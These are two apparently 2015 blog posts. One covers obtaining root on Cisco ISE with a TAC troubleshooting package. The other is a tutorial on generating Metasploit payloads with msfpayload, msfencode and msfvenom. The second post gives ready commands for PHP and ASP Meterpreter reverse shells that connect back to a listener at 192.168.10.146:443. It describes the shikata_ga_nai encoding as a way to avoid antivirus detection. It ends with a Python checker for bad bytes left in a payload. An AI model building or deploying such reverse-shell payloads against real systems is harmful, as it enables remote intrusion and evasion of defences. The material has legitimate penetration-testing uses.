Wednesday, March 11, 2015

Cisco ISE root access

First let me start with a disclaimer. If you do not know what you are doing, then please stop what you are doing.

Ok, so now that that is out of the way, on to the good stuff. Cisco ISE is built on top of Linux. It has a backend Linux shell which is based on the bash shell. It uses an Oracle database. For the most part you should never need to gain access to the root shell. The only way to get root access is to get a file from Cisco TAC called TACtshootx64.tar.gz. The file name may be slightly different based on what version of ISE you are using. In my past experience I have only installed this file when Cisco TAC asked me to.

Effectively, the file gives you root access which can be obtained by executing the below.

1 Put the file in your repo.
2 Install the application using the command

application install TACtshootx64.tar.gz [repo name]

3 Now to get root access:

tac root-access

You should notice that your prompt will change from

hostname/username# to [root@hostname localdisk]#

Now you are the root user and can do all the functions of any other Linux root user.
For example, ps -ef will show you what is running on the system and under what user.
You can shut the ISE node down by typing shutdown -h now.
If you know Oracle DB commands you can edit the database that ISE runs on. Be very careful when modifying the DB. There are many links between many tables, and if you break it, you may just break ISE. Those tasks might be better left to senior level TAC support reps.

If your goal is simply to shut down an ISE node, that can be done by logging into the node as admin or as a user that has the administrator role, and typing the command:

hostname/username#halt

Monday, March 2, 2015

Creating Shells with msfpayload, and msfvenom

msfpayload is a Metasploit utility to create shellcode. The shellcode is used to exploit targets. These exploits can be used to create bind and reverse shells. When coupled with msfencode, they can also be used to obfuscate the signature of the file to help avoid detection by antivirus, remove bad characters (null bytes), inject shellcode into executables, and several other tasks. Below are a few examples of how to create shellcode using msfpayload, as well as msfencode.

# Create a PHP reverse TCP meterpreter
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R >evil.php

# Create an ASP file using reverse TCP meterpreter
msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 R | msfencode -o rmetshell443.asp

In both of the above examples, when the victim opens the exploit, it will attempt to establish a reverse shell by connecting to 192.168.10.146 on tcp port 443. 

For more information on both of these commands check out:
http://www.offensive-security.com/metasploit-unleashed/Msfencode

The makers of Metasploit, in all of their absolute brilliance, have made this even easier in a tool called msfvenom. msfvenom is a combination of both msfpayload and msfencode.

# This command will create a reverse shell, encode it with x86/shikata_ga_nai while avoiding null characters (\x00), and output the result as an ASP file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.146 LPORT=443 -e x86/shikata_ga_nai -b "\x00" -f asp >rmetshell443.asp
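One check worth doing after a command like the one above is to confirm that the encoder really stripped every byte you listed with -b. The Python below is an added example for this post; it is not part of Metasploit and not the original author's code. It parses a -b style escape list (the \xHH form used above), scans a blob of bytes for any listed value that survived, and reports the offsets. SAMPLE_BLOB is a constructed stand-in so the script runs offline; to check real output you would generate the payload with -f raw instead of -f asp (the ASP wrapper is text, not the encoded bytes) and read that file in its place.

```python
import re

# Constructed sample blob (not the output of any tool): two printable bytes, a
# null, another printable byte, a line feed, and one more printable byte. It
# stands in for the raw payload bytes the check would normally read from a file.
SAMPLE_BLOB = b"\x41\x42\x00\x43\x0a\x44"


def parse_badchars(spec: str) -> set[int]:
    r"""Parse a -b style string such as r"\x00\x0a" into a set of byte values.

    Only the \xHH escape form is understood; anything else in spec is ignored.
    """
    return {int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec)}


def find_badchars(blob: bytes, bad: set[int]) -> list[tuple[int, int]]:
    """Return (offset, value) for every byte of blob whose value is in bad."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def is_clean(blob: bytes, spec: str) -> bool:
    """True when no byte listed in spec survives in blob, i.e. the encoder did its job."""
    return not find_badchars(blob, parse_badchars(spec))


def report(blob: bytes, spec: str) -> str:
    """Human-readable summary of the check, one line per surviving bad byte."""
    hits = find_badchars(blob, parse_badchars(spec))
    if not hits:
        return f"clean: none of {spec} found in {len(blob)} bytes"
    lines = [f"{len(hits)} bad byte(s) in {len(blob)} bytes:"]
    lines += [f"  offset {off:#06x}: {val:#04x}" for off, val in hits]
    return "\n".join(lines)


if __name__ == "__main__":
    # With the constructed sample this reports the null at offset 2 and the
    # line feed at offset 4; a correctly encoded payload would report clean.
    print(report(SAMPLE_BLOB, r"\x00\x0a"))
```

Running the check against the raw payload before wrapping it in a file format catches the case where a chosen encoder cannot satisfy the bad-character list for a given payload, which msfvenom normally reports but which is easy to miss in a long output.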